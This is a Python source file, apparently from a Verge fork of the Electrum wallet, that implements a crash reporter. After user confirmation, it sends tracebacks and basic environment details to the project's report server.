# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
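# Base class for the crash reporter; concrete subclasses (e.g. the GUI dialogs)
# are expected to implement get_user_description() and get_wallet_type().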
report_server = "https://vergecurrency.com"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
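# exc_args mirrors sys.exc_info(): (exception type, exception instance, traceback).
# It is consumed by get_traceback_info() and get_report_string() below.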
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
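# Collects the traceback and environment details, serializes them to JSON and
# POSTs them to report_server on the given asyncio loop; refuses to send when
# the genesis hash does not match the expected networks (i.e. an altcoin fork
# reusing this code).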
if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".vergecurrency.com" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = "".join(traceback.format_exception(*self.exc_args))
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self):
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# will not spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|